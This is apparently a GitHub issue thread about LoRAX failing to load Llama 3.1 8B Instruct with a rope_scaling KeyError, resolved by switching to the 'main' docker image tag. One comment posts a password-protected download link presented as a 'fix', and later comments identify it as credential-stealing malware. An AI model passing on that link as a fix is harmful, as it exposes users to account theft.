### ISSUE TITLE
Issues loading Llama 3.1 8B Instruct

### ISSUE THREAD

**Issue by jonseaberg** [predibase/lorax#592]
### System Info

Running the docker command in AWS
Instance Type: g5.xlarge
AMI: Deep Learning Base OSS Nvidia Driver AMI (Amazon Linux 2) Version 65.5 

### Information

- [X] Docker
- [ ] The CLI directly

### Tasks

- [X] An officially supported command
- [ ] My own modifications

### Reproduction

Launching lorax using docker.  Trying to load `meta-llama/Meta-Llama-3.1-8B-Instruct` 

```
docker run --gpus all -p 8080:80 -e HUGGING_FACE_HUB_TOKEN=<token> -v ${PWD}/data:/data ghcr.io/predibase/lorax:0.9.0 --model-id meta-llama/Meta-Llama-3.1-8B-Instruct
```

```
docker run --gpus all -p 8080:80 -e HUGGING_FACE_HUB_TOKEN=<token> -v ${PWD}/data:/data ghcr.io/predibase/lorax:0.10.0 --model-id meta-llama/Meta-Llama-3.1-8B-Instruct
```

```
docker run --gpus all -p 8080:80 -e HUGGING_FACE_HUB_TOKEN=<token> -v ${PWD}/data:/data ghcr.io/predibase/lorax:latest --model-id meta-llama/Meta-Llama-3.1-8B-Instruct
```

With each attempt I received the following error message when the model was loading:
```
2024-08-26T20:18:10.031153Z  INFO download: lorax_launcher: Starting download process.
2024-08-26T20:18:21.780871Z  INFO lorax_launcher: cli.py:110 Files are already present on the host. Skipping download.

2024-08-26T20:18:23.047881Z  INFO download: lorax_launcher: Successfully downloaded weights.
2024-08-26T20:18:23.048163Z  INFO shard-manager: lorax_launcher: Starting shard rank=0
2024-08-26T20:18:33.058055Z  INFO shard-manager: lorax_launcher: Waiting for shard to be ready... rank=0
2024-08-26T20:18:36.034234Z ERROR lorax_launcher: server.py:274 Error when initializing model
Traceback (most recent call last):
  File "/opt/conda/bin/lorax-server", line 8, in <module>
    sys.exit(app())
  File "/opt/conda/lib/python3.10/site-packages/typer/main.py", line 311, in __call__
    return get_command(self)(*args, **kwargs)
  File "/opt/conda/lib/python3.10/site-packages/click/core.py", line 1157, in __call__
    return self.main(*args, **kwargs)
  File "/opt/conda/lib/python3.10/site-packages/typer/core.py", line 778, in main
    return _main(
  File "/opt/conda/lib/python3.10/site-packages/typer/core.py", line 216, in _main
    rv = self.invoke(ctx)
  File "/opt/conda/lib/python3.10/site-packages/click/core.py", line 1688, in invoke
    return _process_result(sub_ctx.command.invoke(sub_ctx))
  File "/opt/conda/lib/python3.10/site-packages/click/core.py", line 1434, in invoke
    return ctx.invoke(self.callback, **ctx.params)
  File "/opt/conda/lib/python3.10/site-packages/click/core.py", line 783, in invoke
    return __callback(*args, **kwargs)
  File "/opt/conda/lib/python3.10/site-packages/typer/main.py", line 683, in wrapper
    return callback(**use_params)  # type: ignore
  File "/opt/conda/lib/python3.10/site-packages/lorax_server/cli.py", line 89, in serve
    server.serve(
  File "/opt/conda/lib/python3.10/site-packages/lorax_server/server.py", line 324, in serve
    asyncio.run(
  File "/opt/conda/lib/python3.10/asyncio/runners.py", line 44, in run
    return loop.run_until_complete(main)
  File "/opt/conda/lib/python3.10/asyncio/base_events.py", line 636, in run_until_complete
    self.run_forever()
  File "/opt/conda/lib/python3.10/asyncio/base_events.py", line 603, in run_forever
    self._run_once()
  File "/opt/conda/lib/python3.10/asyncio/base_events.py", line 1909, in _run_once
    handle._run()
  File "/opt/conda/lib/python3.10/asyncio/events.py", line 80, in _run
    self._context.run(self._callback, *self._args)
> File "/opt/conda/lib/python3.10/site-packages/lorax_server/server.py", line 270, in serve_inner
    model = get_model(
  File "/opt/conda/lib/python3.10/site-packages/lorax_server/models/__init__.py", line 141, in get_model
    return FlashLlama(
  File "/opt/conda/lib/python3.10/site-packages/lorax_server/models/flash_llama.py", line 95, in __init__
    model = FlashLlamaForCausalLM(config, weights)
  File "/opt/conda/lib/python3.10/site-packages/lorax_server/models/custom_modeling/flash_llama_modeling.py", line 512, in __init__
    self.model = FlashLlamaModel(config, weights)
  File "/opt/conda/lib/python3.10/site-packages/lorax_server/models/custom_modeling/flash_llama_modeling.py", line 448, in __init__
    [
  File "/opt/conda/lib/python3.10/site-packages/lorax_server/models/custom_modeling/flash_llama_modeling.py", line 449, in <listcomp>
    FlashLlamaLayer(
  File "/opt/conda/lib/python3.10/site-packages/lorax_server/models/custom_modeling/flash_llama_modeling.py", line 383, in __init__
    self.self_attn = FlashLlamaAttention(
  File "/opt/conda/lib/python3.10/site-packages/lorax_server/models/custom_modeling/flash_llama_modeling.py", line 216, in __init__
    self.rotary_emb = PositionRotaryEmbedding.static(
  File "/opt/conda/lib/python3.10/site-packages/lorax_server/utils/layers.py", line 830, in static
    rope_type = rope_scaling.pop("type")
KeyError: 'type'

2024-08-26T20:18:37.061668Z ERROR shard-manager: lorax_launcher: Shard complete standard error output:

Special tokens have been added in the vocabulary, make sure the associated word embeddings are fine-tuned or trained.
You are using a model of type llama to instantiate a model of type . This is not supported for all configurations of models and can yield errors.
Traceback (most recent call last):

  File "/opt/conda/bin/lorax-server", line 8, in <module>
    sys.exit(app())

  File "/opt/conda/lib/python3.10/site-packages/lorax_server/cli.py", line 89, in serve
    server.serve(

  File "/opt/conda/lib/python3.10/site-packages/lorax_server/server.py", line 324, in serve
    asyncio.run(

  File "/opt/conda/lib/python3.10/asyncio/runners.py", line 44, in run
    return loop.run_until_complete(main)

  File "/opt/conda/lib/python3.10/asyncio/base_events.py", line 649, in run_until_complete
    return future.result()

  File "/opt/conda/lib/python3.10/site-packages/lorax_server/server.py", line 270, in serve_inner
    model = get_model(

  File "/opt/conda/lib/python3.10/site-packages/lorax_server/models/__init__.py", line 141, in get_model
    return FlashLlama(

  File "/opt/conda/lib/python3.10/site-packages/lorax_server/models/flash_llama.py", line 95, in __init__
    model = FlashLlamaForCausalLM(config, weights)

  File "/opt/conda/lib/python3.10/site-packages/lorax_server/models/custom_modeling/flash_llama_modeling.py", line 512, in __init__
    self.model = FlashLlamaModel(config, weights)

  File "/opt/conda/lib/python3.10/site-packages/lorax_server/models/custom_modeling/flash_llama_modeling.py", line 448, in __init__
    [

  File "/opt/conda/lib/python3.10/site-packages/lorax_server/models/custom_modeling/flash_llama_modeling.py", line 449, in <listcomp>
    FlashLlamaLayer(

  File "/opt/conda/lib/python3.10/site-packages/lorax_server/models/custom_modeling/flash_llama_modeling.py", line 383, in __init__
    self.self_attn = FlashLlamaAttention(

  File "/opt/conda/lib/python3.10/site-packages/lorax_server/models/custom_modeling/flash_llama_modeling.py", line 216, in __init__
    self.rotary_emb = PositionRotaryEmbedding.static(

  File "/opt/conda/lib/python3.10/site-packages/lorax_server/utils/layers.py", line 830, in static
    rope_type = rope_scaling.pop("type")

KeyError: 'type'
 rank=0
Error: ShardCannotStart
2024-08-26T20:18:37.159496Z ERROR lorax_launcher: Shard 0 failed to start
2024-08-26T20:18:37.159518Z  INFO lorax_launcher: Shutting down shards
```

### Expected behavior

The server to start

**Comment by c0ffincolors** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by caineblood** [comment]
that is malware to steal your account; do not under any circumstances download or run it. The post needs to be removed. If you have attempted to run it please have your system cleaned and your account secured immediately.

**Comment by jonseaberg** [comment]
Also tried hugging face text-generation-interface and the server was able to start and perform inference.

```
docker run --gpus all -p 8080:80 -e HUGGING_FACE_HUB_TOKEN=<token> -v ${PWD}/data:/data ghcr.io/huggingface/text-generation-inference:2.2.0 --model-id meta-llama/Meta-Llama-3.1-8B-Instruct
```

**Comment by tgaddair** [comment]
Thanks for reporting @caineblood , the malware post has been removed.

Regarding the issue here, @jonseaberg can you confirm you're using the latest `main` version of LoRAX?

**Comment by jonseaberg** [comment]
@tgaddair I believe so.  This is the command I ran.  Using the image with the `latest` tag.

```
docker run --gpus all -p 8080:80 -e HUGGING_FACE_HUB_TOKEN=<token> -v ${PWD}/data:/data ghcr.io/predibase/lorax:latest --model-id meta-llama/Meta-Llama-3.1-8B-Instruct
```

**Comment by tgaddair** [comment]
@jonseaberg can you try using `main` instead of `latest` tag?

**Comment by jonseaberg** [comment]
@tgaddair Just tried and `main` works!  Thank you for your quick response and help.  Is there a release planned for the near future or another way to pin to a specific image?

**Comment by tgaddair** [comment]
Yes, apologies for the out-dated latest! We have a couple big features we're finishing up testing and plan to do a release once those are hardened a bit. So should be in the next week or two.

**Comment by jonseaberg** [comment]
Awesome! Really appreciate everything the team is doing.  Thank you for sharing LoRAX with the world.
